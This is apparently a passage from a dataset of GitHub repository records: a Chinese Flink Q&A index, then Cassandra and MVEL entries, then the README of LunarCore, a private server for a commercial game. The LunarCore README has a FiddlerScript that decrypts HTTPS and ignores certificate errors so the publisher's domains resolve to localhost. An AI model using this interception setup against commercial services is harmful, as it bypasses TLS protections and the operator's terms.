-303、[我自己写的kafka生产者测试,数据格式十分简单(key,i)key是一个固定的不变的字符串,i是自增的,flink consumer这边我开了checkpoint. 并且是exactly once,然后程序很简单,就是flink读取kafka的数据然后直接打印出来,我发现比如我看到打印到key,10的时候我直接关掉程序,然后重新启动程序,按理来说应当是从上次的offset继续消费,也就是key,11,但实际上我看到的可能是从key,9开始,然后依次递增,这是是不是说明是重复消费了,那exactly one需要怎么样去保障?](https://t.zsxq.com/MVfeeiu) - -304、[假设有一个数据源在源源不断的产生数据,到Flink的反压来到source端的时候,由于Flink处理数据的速度跟不上数据源产生数据的速度, - 问题1: 这个时候在Flink的source端会怎么���理呢?是将处理不完的数据丢弃还是进行缓存呢? - 问题2: 如果是缓存,怎么进行缓存呢?](https://t.zsxq.com/meqzJme) - -305、[一个stream 在sink多个时,这多个sink是串行 还是并行的。](https://t.zsxq.com/2fEeMny) - -306、[我想在流上做一个窗口,触发窗口的条件是固定的时间间隔或者数据量达到预切值,两个条件只要有一个满足就触发,除了重写trigger在,还有什么别的方法吗?](https://t.zsxq.com/NJY76uf) - -307、[使用rocksdb作为状态后端,对于使用sql方式对时间字段进行group by,以达到去窗口化,但是这样没办法对之前的数据清理,导致磁盘空间很大,对于这种非编码方式,有什么办法设置ttl,清理以前的数据吗](https://t.zsxq.com/A6UN7eE) - -308、[请问什么时间窗为什么会有TimeWindow{start=362160000, end=362220000} - 和 TimeWindow{start=1568025300000, end=1568025360000}这两种形式,我都用的是一分钟的TumblingEventTimeWindows,为什么会出现不同的情况?](https://t.zsxq.com/a2fUnEM) - -309、[比如我统计一天的订单量。但是某个数据延迟一天才到达。比如2019.08.01这一天订单量应该是1000,但是有个100的单据迟到了,在2019.08.02才到达,那么导致2019.08.01这一天统计的是900.后面怎么纠正这个错误的结果呢](https://t.zsxq.com/Y3jqjuj) - -310、[flink streaming 模式下只使用堆内内存么](https://t.zsxq.com/zJaMNne) - -311、[如果考虑到集群的迁移,状态能迁移吗](https://t.zsxq.com/EmMrvVb) - -312、[我们现在有一个业务场景,数据上报的值是这样的格式(时间,累加值),我们需要这样的格式数据(时间,当前值)。当前值=累加值-前一个数据的累加值。flink如何做到呢,有考虑过state机制,但是服务宕机后,state就被清空了](https://t.zsxq.com/6EUFeqr) - -313、[Flink On k8s 与 Flink on Yarn相比的优缺点是什么?那个更适合在生产环境中使用呢](https://t.zsxq.com/y7U7Mzf) - -314、[有没有datahub链接flink的 连接器呀](https://t.zsxq.com/zVNbaYn) - -315、[单点resourcemanager 挂了,对任务会产生什么影响呢](https://t.zsxq.com/FQRNJ2j) - -316、[flink监控binlog,跟另一张维表做join后,sink到MySQL的最终表。对于最终表的增删改操作,需要定义不同的sink么?](https://t.zsxq.com/rnemUN3) - -317、[请问窗口是在什么时候合并的呢?例如:数据进入windowoperator的processElement,如果不是sessionwindow,是否会进行窗口合并呢?](https://t.zsxq.com/JaaQFqB) - -318、[Flink中一条流能参与多路计算,并多处输出吗?他们之前会不会相互影响?](https://t.zsxq.com/AqNFM33) - -319、[keyBy算子定义是将一个流拆分成不相交的分区,每个分区包含具有相同的key的元素。我不明白的地方是: keyBy怎么设置分区数,是给这个算子设置并行度吗? 分区数和slot数量是什么关系?](https://t.zsxq.com/nUzbiYj) - -320、[动态cep-pattern,能否详细说下?滴滴方案未公布,您贴出来的几张图片是基于1.7的。或者有什么想法也可以讲解下,谢谢了](https://t.zsxq.com/66URfQb) - -321、[问题1:使用常驻型session ./bin/yarn-session.sh -n 10 -s 3 -d启动,这个时候分配的资源是yarn 队列里面的, flink提交任务 flink run xx.jar, 其余机器是怎样获取到flink需要运行时的环境的,因为我只在集群的一台机器上有flink 安装包。](https://t.zsxq.com/maEQ3NR) - -322、[flink task manager中slot间的内存隔离,cpu隔离是怎么实现的?flink 设计slot的概念有什么意义,为什么不像spark executor那样,内部没有做隔离?](https://t.zsxq.com/YjEYjQz) - -323、[spark和kafka集成,direct模式,spark的一个分区对应kafka的一个主题的一个分区。那flink和kafka集成的时候,怎么消费kafka的数据,假设kafka某个主题5个partition](https://t.zsxq.com/nuzvVzZ) - -324、[./bin/flink run -m yarn-cluster 执行的flink job ,作业自己打印的日志通过yarn application的log查看不了,只有集群自身的日志,程序中logger.info打印日志存放在哪,还是我打包的方式问题,打日志用的是slf4j。](https://t.zsxq.com/27u3ZZf) - -325、[在物联网平台中,需要对每个key下的数据做越限判断,由于每个key的越限值是不同的,越限值配置在实时数据库中。 - 若将越限值加载到state中,由于key的量很大(大概3亿左右),会导致state太大,可能造成内存溢出。若在处理数据时从实时数据库中读取越限值,由于网络IO开销,可能造成实时性下降。请问该如何处理?谢谢](https://t.zsxq.com/miuzFY3) - -326、[如果我一个flink程序有多个window操作,时间戳和watermark是不是每个window都需要分配,还有就是事件时间是不是一定要在数据源中就存在某个字段](https://t.zsxq.com/amURvZR) - -327、[有没���flink1.9刚支持的用ddl链接kafka并写入hbase的资料,我们公司想把离线的数仓逐渐转成实时的,写sql对于我们来说上手更快一些,就想找一些这方面的资料学习一下。](https://t.zsxq.com/eqFuBYz) - -328、[flink1.9 进行了数据类型的转化时发生了不匹配的问题, 目前使用的Type被弃用,推荐使用是datatypes 类型,但是之前使用的Type类型的方法 对应的schema typeinformation 目前跟datatypes的返回值不对应,请问下 该怎么去调整适配?](https://t.zsxq.com/yVvR3V3) - -329、[link中处理数据其中一条出了异常都会导致整个job挂掉?有没有方法(除了异常捕获)让这条数据记录错误日志就行 下面的数据接着处理呢? 粗略看过一些容错处理,是关于程度挂了重启后从检查点拉取数据,但是如果这条数据本身就问提(特别生产上,这样就导致job直接挂了,影响有点大),那应该怎么过滤掉这条问题数据呢(异常捕获是最后的方法](https://t.zsxq.com/6AIQnEi) - -330、[我在一个做日报的统计中使用rabbitmq做数据源,为什么rabbitmq中的数据一直处于unacked状态,每分钟触发一次窗口计算,并驱逐计算过的元素,我在测试环境数据都能ack,但是一到生产环境就不行了,也没有报错,有可能是哪里出了问题啊](https://t.zsxq.com/RBmi2vB) - -331、[我们目前数据流向是这样的,kafka source ,etl,redis sink 。这样chk 是否可以保证端到端语义呢?](https://t.zsxq.com/fuNfuBi) - -332、[1.在通过 yarn-session 提交 flink job 的时候。flink-core, flink-clients, flink-scala, flink-streaming-scala, scala-library, flink-connector-kafka-0.10 那些应该写 provided scope,那些应该写 compile scope,才是正确、避免依赖冲突的姿势? - 2.flink-dist_2.11-1.8.0.jar 究竟包含了哪些依赖?(这个文件打包方式不同于 springboot,无法清楚看到有哪些 jar 依赖)](https://t.zsxq.com/mIeMzvf) - -333、[Flink 中使用 count window 会有这样的问题就是,最后有部分数据一直没有达到 count 的值,然后窗口就一直不触发,这里看到个思路,可以将 time window + count window 组合起来](https://t.zsxq.com/AQzj6Qv) - -334、[flink流处理时,注册一个流数据为Table后,该流的历史数据也会一直在Table里面么?为什么每次来新数据,历史处理过得数据会重新被执行?](https://t.zsxq.com/VvR3Bai) - -335、[available是变化数据,除了最新的数据被插入数据库,之前处理过数据又重新执行了几次](https://t.zsxq.com/jMfyNZv) - -336、[这里两天在研究flink的广播变量,发现一个问题,DataSet数据集中获取广播变量,获取的内存地址是一样的(一台机器维护一个广播数据集)。在DataStream中获取广播变量就成了一个task维护一个数据集。(可能是我使用方式有问题) 所以想请教下星主,DataStream中获取一个画面变量可以如DataSet中一台机器维护一个数据吗?](https://t.zsxq.com/m6Yrv7Q) - -337、[Flink程序开启checkpoint 机制后,用yarn命令多次killed以后,ckeckpoint目录下有多个job id,再次开辟资源重新启动程序,程序如何找到上一次jobid目录下,而不是找到其他的jobid目录下?默认是最后一个还是需要制定特定的jobid?](https://t.zsxq.com/nqzZrbq) - -338、[发展昨天的数据重复插入问题,是把kafka里进来的数据流registerDataStream注册为Table做join时,打印表的长度发现,数据会一直往表里追加,怎样才能来一条处理一条,不往上追加呀](https://t.zsxq.com/RNzfQ7e) - -339、[flink1.9 sql 有没有类似分区表那样的处理方式呢?我们现在有一个业务是1个source,但是要分别计算5分钟,10分钟,15分钟的数据。](https://t.zsxq.com/AqRvNNj) - -340、[我刚弄了个服务器,在启动基础的命令时候发现task没有启动起来,导致web页是三个0,我看了log也没有报错信息,请问您知道可能是什么问题吗?](https://t.zsxq.com/q3feIuv) - -241、[我自定义了个 Sink extends RichSinkFunction,有了 field: private transient Object lock; - 这个 lock 我直接初始化 private transient Object lock = new Object(); 就不行,在 invoke 里 使用lock时空指针,如果lock在 自定义 Sink 的 构造器初始化也不行。但是在 open 方法里初始化就可以,为什么?能解释一下 执行原理吗?如果一个slot 运行着5个 sink实例,那么 这个sink对象会new 5个还是1个?](https://t.zsxq.com/EIiyjeU) - -342、[请问Kafka的broker 个数怎么估算?](https://t.zsxq.com/aMNnIy3) - -343、[flink on yarn如何远程调试](https://t.zsxq.com/BU7iqbi) - -344、[目前有个需求:就是源数据是dataA、dataB、DataC通过kafka三个topic获取,然后进行合并。 - 但是有有几个问题,目前不知道怎么解决: - dataA=""id:10001,info:***,date:2019-08-01 12:23:33,entry1:1,entryInfo1:***"" - dataB=""id:10001,org:***,entry:1"" dataC=""id:10001,location:***"" - (1) 如何将三个流合并? (1) 数据中dataA是有时间的,但是dataB和dataC中都没有时间戳,那么如何解决eventTime及迟到乱序的问题?帮忙看下,谢谢](https://t.zsxq.com/F6U7YbY) - -345、[我flink从kafka读json数据,在反序列化后中文部分变成了一串问号,请问如何做才能使中文正常](https://t.zsxq.com/JmIqfaE) - -346、[我有好几个Flink程序(独立jar),在线业务数据分析时都会用到同样的一批MySQL中的配置数据(5千多条),现在的实现方法是每一个程序都是独立把这些配置数据装到内存中,便于快速使用,但现在感觉有些浪费资源和结构不够美观,请问这类情况有什么其他的解决方案吗?谢谢](https://t.zsxq.com/3BMZfAM) - -347、[Flink checkpoint 选 RocksDBStateBackend 还是 FsStatebackEnd ,我们目前是任务执行一段时间之后 任务就会被卡死。](https://t.zsxq.com/RFMjYZn) - -348、[flink on k8s的高可用、扩缩容这块目前还有哪些问题?](https://t.zsxq.com/uVv7uJU) - -349、[有个问题问一下,是这样的现在Kafka4个分区每秒钟生产4000多到5000条日志数据,但是在消费者FLINK这边接收我只开了4个solt接收,这边只是接收后做切分存储,现在出现了延迟现象,我不清楚是我这边处切分慢了还是Flink接收kafka的数据慢了?Flink UI界面显示这两个背压高](https://t.zsxq.com/zFq3fqb) - -350、[想请问一下,在flink集群模式下,能不能指定某个节点来执行一个task?](https://t.zsxq.com/NbaMjem) - -+ [请问一下aggrefunction 的merge方法什么时候会用到呢,google上有答案说合并相同的key, 但相同的key应该是被hash相同的task上了?这块不是很理解](https://t.zsxq.com/VnEim6m) - -+ [请问flink遇到这种问题怎么解决?1. eventA发起事件,eventB响应事件,每分钟统计事件的响应的成功率。说明,eventA和eventB有相同的commitId关联,eventA到flink的时间早于eventB的时间,但eventB到达的时间也有可能早于eventA。要求是:eventA有A,B,C,D,E五条数据,如果eventB有A',B',C',X',Y'五条数据,成功率是3/5.2. 每分钟统计一次eventC成功率(状态0、1)。但该事件日志会重复报,只统计eventTime最早的一条。上一分钟统计到过的,下一分钟不再统计](https://t.zsxq.com/eMnMrRJ) - -+ [Flink当前版本中Yarn,k8s,standalone的HA设计方案与源码解析请问可以系统性讲讲么](https://t.zsxq.com/EamqrFQ) - -+ [怎么用javaAPI提交job以yarn-cluster模式运行](https://t.zsxq.com/vR76amq) - -+ [有人遇到过流损坏的问题么?不知道怎么着手解决?](https://t.zsxq.com/6iMvjmq) - -+ [从这个日志能看出什么异常的原因吗?我查看了kafka,yarn,zookeeper。这三个组件都没有任何异常](https://t.zsxq.com/uByFUrb) - -+ [为啥flink内部维护两套通信框架,client与jobmanager和jobmanager与taskmanager是akka通信,然而takmanager之间是netty通信?](https://t.zsxq.com/yvBiImq) - -+ [问各位球友一个小问题,flink 的 wordcount ,输出在控制台的时候,前面有个数字 > 是什么意思](https://t.zsxq.com/yzzBMji) - -+ [从kafka的topicA读数据,转换后写入topicB,开启了checkpoint,任务启动后正常运行,新的topic也有数据写入,但是想监控一下消费topicA有没有延迟,使用kafka客户端提供的脚本查看groupid相关信息,提示没有该groupid](https://t.zsxq.com/MNFUVnE) - -+ [将flink分流之后,再进行窗口计算,如何将多个窗口计算的结果汇总起来 作为一个sink,定时输出? - 我想将多个流计算的不同实时统计指标,比如每1min对多个指标进行统计(多个指标分布在不同的流里面),然后将多个指标作为一条元组存入mysql中?](https://t.zsxq.com/mUfm2zF) - -+ [Flink最终如何输出到数据大屏上去。](https://t.zsxq.com/nimeA66) - -+ [为什么我keyby 之后,不同key的数据会进入同一个AggregateFunction中吗? 还是说不同key用的AggregateFunction实列是同一个呢?我在AggregateFunction中给一个对象赋值之后,发现其他key的数据会把之前的数据覆盖,这是怎么回事啊?](https://t.zsxq.com/IMzBUFA) - -+ [flink窗口计算的结果怎么和之前的结果聚合在一起](https://t.zsxq.com/yFI2FYv) - -+ [flink on yarn 的任务该如何监控呢,之前自带 influxdb metrics 好像无法采集到flink on yarn 的指标](https://t.zsxq.com/ZZ3FmqF) - -+ [link1.9.0消费kafka0.10.1.1数据时,通过ui监控查看发现部分分区的current offset和commit offset一直显示为负数,随着程序运行也始终不变,麻烦问下这是怎么回事?](https://t.zsxq.com/QvRNjiU) - -+ [flink 1.9 使用rank的时候报,org.apache.flink.table.api.TableException: RANK() on streaming table is not supported currently](https://t.zsxq.com/Y7MBaQb) - -+ [Flink任务��不能动态的变更source源kafka的topic,但是又不用重启任务](https://t.zsxq.com/rzVjMjM) - -+ [1、keyed state 和opeater state 区分点是啥(是否进行了shuffle流程?) - 2、CheckpointedFunction 这个接口的作用是啥? - 3、何时调用这个snapshotState这个方法?](https://t.zsxq.com/ZVnEyne) - -+ [请教一下各位大佬,日志一般都怎么收集?task manager貌似把不同job的日志都打印在一起,有木有分开打印的办法?](https://t.zsxq.com/AayjeiM) - -+ [最近接到一个需求,统计今天累计在线人数并且要去重,每5秒显示一次结果,请问如何做这个需求?](https://t.zsxq.com/IuJ2FYR) - -+ [目前是flink消费kafka的一个问题。kafka使用的是阿里云的kafka,可以申请consumer。目前在同一个A-test的topic下,使用A1的consumer组进行消费,但是在两个程序里,source端得到的数据量差别很大,图一是目前消费kafka写入到另一个kafka的topic中,目前已知只有100条;图二是消费kafka,写入到hdfs中。两次消费起始偏移量一致(消费后,恢复偏移量到最初再消费)按照时间以及设置从头开始消费的策略也都还是只有100条;后面我把kafka的offset提交到checkpoint选项关掉了,也还是只有100条。很奇怪,所以想问一下,目前这个问题是要从state来出发解决](https://t.zsxq.com/eqBUZFm) - -+ [问一下 grafana的dashboard 有没有推荐的,我们现在用是prometheus pushgateway reporter来收集metric。但是目前来说,到底哪些指标是要重点关注的还是不太清楚](https://t.zsxq.com/EYz7iMV) - -+ [on yarn 1. session 模式提交是不是意味着 多个flink任务会由同一个 jobManager 管理 2. per-job 模式 会启动各自多个jobManager](https://t.zsxq.com/u3vVV3b) - -+ [您在flink里面使用过lettuce连接redis cluster吗,我这里使用时报错,Cannot retrieve initial cluster partitions from initial URIs](https://t.zsxq.com/VNnEQJ6) - -+ [zhisheng你好,我在使用flink滑动窗口时,每10分钟会向redis写入大量的内容,影响了线上性能,这个有什么办法可以控制写redis的速度吗?](https://t.zsxq.com/62ZZJmi) - -+ [flink standalone模式,启动服务的命令为:flink run -c 类名 jar包 。对应的Slots怎么能均匀分布呢?目前遇到问题,一直使用一个机器的Slots,任务多了后直接会把taskjob挂掉。报错信息如二图](https://t.zsxq.com/2zjqVnE) - -+ [zhisheng你好,像standalone与yarn集群,其master与workers相互通信都依赖于ssh协议,请问有哪种不依赖于ssh协议的搭建方式吗?](https://t.zsxq.com/qzrvbaQ) - -+ [官网中,这两种周期性watermaker的产生分别适用什么场景呢?](https://t.zsxq.com/2fUjAQz) - -+ [周期性的watermarke 设置定时产生, ExecutionConfig.setAutoWatermarkInterval(…),这个定时的时间一般怎样去评估呢?](https://t.zsxq.com/7IEAyV3) - -+ [想问一下能否得到flink分配资源的时间?](https://t.zsxq.com/YjqRBq3) - -+ [问下flink向kafka生产数据有时候报错:This server does not host this topic-partition](https://t.zsxq.com/vJyJiMJ) - -+ [flink yarn 模式启动,log4j. properties配置信息见图片,yarn启动页面的taskmanager能看到日志输出到stdout,但是在指定的日志文件夹中就是没有日志文件生成。,本地运行有日志文件的](https://t.zsxq.com/N3ZrZbQ) - -+ [教一个问题。flink2hbase 如何根据hbase中的日期字段,动态按天建表呢?我自定义了hbase sink,在invoke方法中根据数据的时间建表,但是带来了一个问题,每条数据都要去check表是否存在,这样会产生大量的rpc请求。请问星主大大,针对上述这种情况,有什么好的解决办法吗?](https://t.zsxq.com/3rNBubU) - -+ [你好,有关于TM,slots,内存,线程数,进程数,cpu,调度相关的资料吗?比如一个slot起多少线程,为什么,如何起的,task是如何调度的之类的。网上没找到想要的,书上写的也不够细。源码的话刚开始看不太懂,所以想先找找资料看看](https://t.zsxq.com/buBIAMf) - -+ [能否在flink中只新建一个FlinkKafkaConsumer读取多个kafka的topics ,这些topics的处理逻辑都是一样的 最终将数据写入每个topic对应的es表 请问这个实现逻辑是怎样的 ](https://t.zsxq.com/EY37aEm) - -+ [能不能描述一下在窗口中,例如滚动窗口,多个事件进窗口后,事件在内存中保存的形式是怎么样的?会变成一个state?还是多个事件变成一个state?事件跟state的关系?事件时间过了在窗口是怎么清理事件的?如果state backends用的是RocksDBStateBackend,增量checkpoint,怎么清理已保存过期的事件咧?](https://t.zsxq.com/3vzzj62) - -+ [请问一下 Flink的监控是如何做的?比如job挂了能告警通知。目前是想用Prometheus来做监控,但是发现上报的指标没有很符合的我需求。我这边用yarn-session启动的job,一个jobManger会管理多个job。Prometheus还是刚了解阶段可能遗漏了一些上报指标,球主大大有没有好的建议。](https://t.zsxq.com/vJyRnY7) - -+ [ProcessTime和EventTime是否可以一起使用?当任务抛出异常失败的时候,如果配置了重启策略,重启时是不是从最近的checkpoint继续?遇到了一个数据库主键冲突的问题,查看kafka数据源发现该主键的消息只有一条,查看日志发现Redis连接池抛了异常(当时Redis在重启)导致任务失败重试,当时用的ProcessTime](https://t.zsxq.com/BuZJaUb) - -+ [flink-kafka 自定义反序列化中如何更好的处理数据异常呢,有翻到前面一篇提问,如果使用 try-catch 捕获到异常,是抛出异常更好呢?还是return null 更好呢](https://t.zsxq.com/u3niYni) - -+ [现在在用flink做上下游数据的比对,现在遇到了性能瓶颈,一个节点现在最多只能消费50条数据。观察taskmanager日志的gc日志发现最大堆内存有2.7g,但是新生代最大只有300m。能不能设置flink的jvm参数,flink on yarn启动模式](https://t.zsxq.com/rvJYBuB) - -+ [请教一个原理性的问题,side out put和直接把一个流用两种方式处理有啥本质区别?我试了下,把一个流一边写缓存,一边入数据库,两边也都是全量数据](https://t.zsxq.com/Ee27i6a) - -+ [如何定义一个flink window处理方式,1秒钟处理500条,1:kafka中有10000条数据时,仍旧1秒钟处理500条;2,kafka中有20条,每隔1秒处理一次。](https://t.zsxq.com/u7YbyFe) - -+ [问一下大佬,网页UI可以进行savepoint的保存么?还是只能从savepoint启动?](https://t.zsxq.com/YfAqFUj) - -+ [能否指定Kafka某些分区消费拉取消息,其他分区不拉取消息。现在有有很多场景,一个topic上百个分区,但是我只需要其中几个分区的数据](https://t.zsxq.com/AUfEAQB) - -+ [我想过滤kafka 读到的某些数据,过滤条件从redis中拿到(与用户的配置相关,所以需要定时更新),总觉得怪怪的,请问有更好的方案吗?因为不提供redis的source,因此我是用jedis客户端来读取redis数据的,数据也获取不到,请问星主,flink代码在编写的时候,一般是如何调试的呢](https://t.zsxq.com/qr7UzjM) - -+ [flink使用rocksdb状态检查点存在HDFS上,有的任务状态很小但是HDFS一个文件最小128M所以磁盘空间很快就满了,有没有啥配置可以自动清理检查点呢](https://t.zsxq.com/Ufqj2ZR) - -+ [这是实时去重的问题。 - 举个例子,当发生订单交易的时候,业务中台会把该比订单消息发送到kafka,然后flink消费,统计总金额。如果因为业务中台误操作,发送了多次相同的订单过来(订单id相同),那么统计结果就会多次累加,造成统计的总金额比实际交易金额更多。我需要自定义在source里通过operate state去重,但是operate state是和每个source实例绑定,会造成重复的订单可能发送到不同的source实例,这样取出来的state里面就可能没有上一次已经记录的订单id,那么就会将这条重复的订单金额统计到最后结果中,](https://t.zsxq.com/RzB6E6A) - -+ [双流join的时候,怎么能保证两边来的数据是对应的?举个例子,订单消息和库存消息,按逻辑来说,发生订单的时候,库存也会变,这两个topic都会同时各自发一条消息给我,我拿到这两条消息会根据订单id做join操作。问题是那如果库存消息延迟了5秒或者10秒,订单消息来的时候就join不到库存消息,这时候该怎么办?](https://t.zsxq.com/nunynmI) - -+ [我这有一个比对程序用的是flink,数据源用的是flink-kafka,业务数据分为上下游,需要根据某个字段分组,相同的key上下游数据放一起比对。上下游数据进来的时间不一样,因此我用了一个可以迭代的窗口大小为5分钟window进行比对处理,最大迭代次数为3次。statebackend用的是fsstatebackend。通过监控发现当程序每分钟数据量超过2万条的时候,程序就不消费数据了,虽然webui上显示正常,而且jobmanager和taskmanager的stdout没有异常日志,但是程序就是不消费数据了。](https://t.zsxq.com/nmeE2Fm) - -+ [异步io里面有个容量,是指同时多少个并发还是,假如我每个taskmanager核数设置10个,共10个taskmanager,那我这个数量只能设置100呢](https://t.zsxq.com/vjimeiI) - -+ [有个性能问题想问下有没有相关的经验?一个job从kafka里读一个topic数据,然后进行分流,使用sideout分开之后直接处理,性能影响大吗?比如分开以后有一百多子任务。还有其他什么好的方案进行分流吗?](https://t.zsxq.com/mEeUrZB) - -+ [线上有个作业抛出了一下异常,但是还能正常运行,这个怎么排查,能否提供一下思路](https://t.zsxq.com/Eayzr3R) - -等等等,还有很多,复制粘贴��我手累啊 😂 - -另外里面还会及时分享 Flink 的一些最新的资料(包括数据、视频、PPT、优秀博客,持续更新,保证全网最全,因为我知道 Flink 目前的资料还不多) - -[关于自己对 Flink 学习的一些想法和建议](https://t.zsxq.com/AybAimM) - -[Flink 全网最全资料获取,持续更新,点击可以获取](https://t.zsxq.com/iaEiyB2) - -再就是星球用户给我提的一点要求:不定期分享一些自己遇到的 Flink 项目的实战,生产项目遇到的问题,是如何解决的等经验之谈! - -1、[如何查看自己的 Job 执行计划并获取执行计划图](https://t.zsxq.com/Zz3ny3V) - -2、[当实时告警遇到 Kafka 千万数据量堆积该咋办?](https://t.zsxq.com/AIAQrnq) - -3、[如何在流数据中比两个数据的大小?多种解决方法](https://t.zsxq.com/QnYjy7M) - -4、[kafka 系列文章](https://t.zsxq.com/6Q3vN3b) - -5、[Flink环境部署、应用配置及运行应用程序](https://t.zsxq.com/iiYfMBe) - -6、[监控平台该有架构是长这样子的](https://t.zsxq.com/yfYrvFA) - -7、[《大数据“重磅炸弹”——实时计算框架 Flink》专栏系列文章目录大纲](https://t.zsxq.com/beu7Mvj) - -8、[《大数据“重磅炸弹”——实时计算框架 Flink》Chat 付费文章](https://t.zsxq.com/UvrRNJM) - -9、[Apache Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM) - -10、[Flink On K8s](https://t.zsxq.com/eYNBaAa) - -11、[Flink-metrics-core](https://t.zsxq.com/Mnm2nI6) - -12、[Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6) - -13、[Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6) - -14、[Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6) - -15、[Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6) - -16、[Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6) - -17、[Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6) - -18、[Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6) - -19、[Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6) - -20、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J) - -21、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7) - -22、[一文搞懂Flink内部的Exactly Once和At Least Once](https://t.zsxq.com/UVfqfae) - -23、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2) - - -当然,除了更新 Flink 相关的东西外,我还会更新一些大数据相关的东西,因为我个人之前不是大数据开发,所以现在也要狂补些知识!总之,希望进来的童鞋们一起共同进步! - -1、[Java 核心知识点整理.pdf](https://t.zsxq.com/7I6Iyrf) - -2、[假如我是面试官,我会问你这些问题](https://t.zsxq.com/myJYZRF) - -3、[Kafka 系列文章和学习视频](https://t.zsxq.com/iUZnamE) - -4、[重新定义 Flink 第二期 pdf](https://t.zsxq.com/r7eIeyJ) - -5、[GitChat Flink 文章答疑记录](https://t.zsxq.com/ZjiYrVr) - -6、[Java 并发课程要掌握的知识点](https://t.zsxq.com/QZVJyz7) - -7、[Lightweight Asynchronous Snapshots for Distributed Dataflows](https://t.zsxq.com/VVN7YB2) - -8、[Apache Flink™- Stream and Batch Processing in a Single Engine](https://t.zsxq.com/VVN7YB2) - -9、[Flink状态管理与容错机制](https://t.zsxq.com/NjAQFi2) - -10、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN) - -11、[Flink Checkpoint-轻量级分布式快照](https://t.zsxq.com/QVFqjea) - -12、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN) - -13、[Stream Processing with Apache Flink pdf](https://t.zsxq.com/N37mUzB) - -14、[Flink 结合机器学习算法的监控平台实践](https://t.zsxq.com/m6EAaQ3) - -15、[《大数据重磅炸弹-实时计算Flink》预备篇——大数据实时计算介绍及其常用使用场景 pdf 和视频](https://t.zsxq.com/emMBaQN) - -16、[《大数据重磅炸弹-实时计算Flink》开篇词 pdf 和视频](https://t.zsxq.com/fqfuVRR) - -17、[四本 Flink 书](https://t.zsxq.com/rVBQFI6) - -18、[流处理系统 的相关 paper](https://t.zsxq.com/rVBQFI6) - -19、[Apache Flink 1.9 特性解读](https://t.zsxq.com/FyzvRne) - -20、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne) - -21、[基于Flink on Kubernetes的大数据平台](https://t.zsxq.com/FyzvRne) - -22、[基于Apache Flink的高性能机器学习算法库](https://t.zsxq.com/FyzvRne) - -23、[Apache Flink在快手的应用与实践](https://t.zsxq.com/FyzvRne) - -24、[Apache Flink-1.9与Hive的兼容性](https://t.zsxq.com/FyzvRne) - -25、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne) - -26、[流处理系统的相关 paper](https://t.zsxq.com/rVBQFI6)",0 -apache/cassandra,Mirror of Apache Cassandra,2009-05-21T02:10:09Z,,,0 -mvel/mvel,MVEL (MVFLEX Expression Language),2011-05-17T17:59:38Z,,"# MVEL -MVFLEX Expression Language (MVEL) is a hybrid dynamic/statically typed, embeddable Expression Language and runtime for the Java Platform. - -## Document - -http://mvel.documentnode.com/ - -## How to build - -``` -git clone https://github.com/mvel/mvel.git -cd mvel -mvn clean install -``` -",0 -Melledy/LunarCore,A game server reimplementation for a certain turn-based anime game,2023-10-10T12:57:35Z,,"![LunarCore](https://socialify.git.ci/Melledy/LunarCore/image?description=1&descriptionEditable=A%20game%20server%20reimplementation%20for%20version%202.1.0%20of%20a%20certain%20turn-based%20anime%20game%20for%20educational%20purposes.%20&font=Inter&forks=1&issues=1&language=1&name=1&owner=1&pulls=1&stargazers=1&theme=Light) -
- -
- -[EN](README.md) | [简中](docs/README_zh-CN.md) | [繁中](docs/README_zh-TW.md) | [JP](docs/README_ja-JP.md) | [RU](docs/README_ru-RU.md) | [FR](docs/README_fr-FR.md) | [KR](docs/README_ko-KR.md) | [VI](docs/README_vi-VI.md) - -**Attention:** For any extra support, questions, or discussions, check out our [Discord](https://discord.gg/cfPKJ6N5hw). - -### Notable features -- Basic game features: Logging in, team setup, inventory, basic scene/entity management -- Monster battles working -- Natural world monster/prop/NPC spawns -- Character techniques -- Crafting/Consumables working -- NPC shops handled -- Gacha system -- Mail system -- Friend system (Assists are not working yet) -- Forgotten hall -- Pure Fiction -- Simulated universe (Runs can be finished, but many features are missing) - -# Running the server and client - -### Prerequisites -* [Java 17 JDK](https://www.oracle.com/java/technologies/javase/jdk17-archive-downloads.html) - -### Recommended -* [MongoDB 4.0+](https://www.mongodb.com/try/download/community) - -### Compiling the server -1. Open your system terminal, and compile the server with `./gradlew jar` -2. Create a folder named `resources` in your server directory -3. Download the `Config`, `TextMap`, and `ExcelBin` folders from [https://github.com/Dimbreath/StarRailData](https://github.com/Dimbreath/StarRailData) and place them into your resources folder. -4. Delete the `/resources/Config/LevelOutput` folder. -5. Download the `Config` folder from [https://gitlab.com/Melledy/LunarCore-Configs](https://gitlab.com/Melledy/LunarCore-Configs) and place them into your resources folder. These are for world spawns and are very important for the server. -6. Run the server with `java -jar LunarCore.jar` from your system terminal. Lunar Core comes with a built-in internal MongoDB server for its database, so no Mongodb installation is required. However, it is highly recommended to install Mongodb anyway. - -### Connecting with the client (Fiddler method) -1. **Log in with the client to an official server and Hoyoverse account at least once to download game data.** -2. Install and have [Fiddler Classic](https://www.telerik.com/fiddler) running. -3. Set fiddler to decrypt https traffic. (Tools -> Options -> HTTPS -> Decrypt HTTPS traffic) Make sure `ignore server certificate errors` is checked as well. -4. Copy and paste the following code into the Fiddlerscript tab of Fiddler Classic: - -``` -import System; -import System.Windows.Forms; -import Fiddler; -import System.Text.RegularExpressions; - -class Handlers -{ - static function OnBeforeRequest(oS: Session) { - if (oS.host.EndsWith("".starrails.com"") || oS.host.EndsWith("".hoyoverse.com"") || oS.host.EndsWith("".mihoyo.com"") || oS.host.EndsWith("".bhsr.com"")) { - oS.host = ""localhost""; // This can also be replaced with another IP address. - } - } -}; -``` - -5. If `autoCreateAccount` is set to true in the config, then you can skip this step. 